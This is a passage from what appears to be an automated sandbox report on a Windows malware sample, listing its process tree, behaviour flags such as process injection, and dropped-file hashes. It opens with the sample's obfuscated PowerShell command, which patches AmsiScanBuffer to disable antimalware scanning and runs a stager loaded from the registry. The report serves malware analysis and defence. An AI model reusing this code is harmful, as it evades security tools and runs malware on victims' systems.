''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $jwCbMRxwNFS.CreateType();}$qiawzcceZnuLn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+'2.'+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+'d'+'s');$dOLzvMjtKIGieW=$qiawzcceZnuLn.GetMethod('Ge'+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+'l'+'i'+'c'+[Char](44)+'S'+'t'+''+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gkmfSJHbPDkiPgqHBzl=dgpMGpVmbvjl @([String])([IntPtr]);$QZEexwTILjzndxresJsVBE=dgpMGpVmbvjl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uiApYcaVQgb=$qiawzcceZnuLn.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e'+[Char](72)+''+[Char](97)+'n'+[Char](100)+'le').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+'e'+'l'+'3'+''+'2'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')));$BQLqyEKvYNdeWc=$dOLzvMjtKIGieW.Invoke($Null,@([Object]$uiApYcaVQgb,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+''+[Char](76)+'ib'+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$VfFdGOcIiPHWJpJKh=$dOLzvMjtKIGieW.Invoke($Null,@([Object]$uiApYcaVQgb,[Object]('V'+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$LfCuNsV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BQLqyEKvYNdeWc,$gkmfSJHbPDkiPgqHBzl).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'ll');$fNldNlNVrsTrSNIWg=$dOLzvMjtKIGieW.Invoke($Null,@([Object]$LfCuNsV,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$GYjRaGMxCj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VfFdGOcIiPHWJpJKh,$QZEexwTILjzndxresJsVBE).Invoke($fNldNlNVrsTrSNIWg,[uint32]8,4,[ref]$GYjRaGMxCj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fNldNlNVrsTrSNIWg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VfFdGOcIiPHWJpJKh,$QZEexwTILjzndxresJsVBE).Invoke($fNldNlNVrsTrSNIWg,[uint32]8,0x20,[ref]$GYjRaGMxCj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+'E').GetValue(''+'$'+''+'7'+''+'7'+'s'+'t'+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1472
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2828
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1492
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1832
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2032
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2156
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2256
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2852
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3428
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3532
-
C:\Users\Admin\AppData\Local\Temp\234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe"C:\Users\Admin\AppData\Local\Temp\234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:464
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2956
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1984
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3640
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3832
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3976
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4948
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3416
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:376
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3388
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4584
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3176
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4756
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:2172
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:1800
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
114KB
MD5f1b0d67d9700b657fffb1e53c14444ae
SHA1ae8a3a681da72d78263510a2e6a2ad5a66cb0164
SHA2567a26e63a529f6c2ceb6063b72e61caae2a643152c7b1b75b3396a700aac95bc1
SHA512a2b3ab1807a517b1b499df7d8cbd7b695918113f4124b60ab54b6fa1b2fee6d0813c73202ceec42c7b9fc2c124e0555ecff62acb948cf0ddc19b51607f527b50
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
96KB
MD540f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1d6582ba879235049134fa9a351ca8f0f785d8835
SHA256cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82